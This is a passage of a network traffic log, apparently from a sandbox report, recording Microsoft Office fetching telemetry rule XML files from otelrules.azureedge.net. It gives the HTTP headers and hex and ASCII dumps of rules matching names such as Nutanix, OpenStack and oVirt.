                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            79192.168.2.44968813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                            x-ms-request-id: f716b4a5-801e-008c-7dac-347130000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-r178fb8d765jv86hhC1DFW8pt000000002m0000000001w9s
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            80192.168.2.44968913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                            x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-16547b76f7f7rtshhC1DFWrtqn0000000kqg000000003n8w
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            81192.168.2.44969013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                            x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-16547b76f7fr4g8xhC1DFW9cqc0000000hp000000000fk0f
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            82192.168.2.44969113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                            x-ms-request-id: dfccd5b2-501e-00a3-0f60-35c0f2000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-r178fb8d765th6bkhC1DFWr7h000000002p0000000004048
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            83192.168.2.44969313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                            x-ms-request-id: d2524e31-e01e-0052-0da7-34d9df000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-r178fb8d765zlhnthC1DFWvdu0000000014g000000001qtf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            84192.168.2.44969513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 502
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                            x-ms-request-id: dcb3d461-101e-000b-6d69-355e5c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120238Z-1749fc9bdbd85qw2hC1DFW157000000002pg000000002mtf
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            85192.168.2.44969613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                            x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120238Z-16547b76f7fk9g8vhC1DFW825400000000kg000000001trg
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            86192.168.2.44969713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                            x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120238Z-16547b76f7frbg6bhC1DFWr5400000000kmg000000001kmq
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            87192.168.2.44969813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                            x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120238Z-1749fc9bdbdhnf7rhC1DFWgd0n00000002h0000000005kup
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
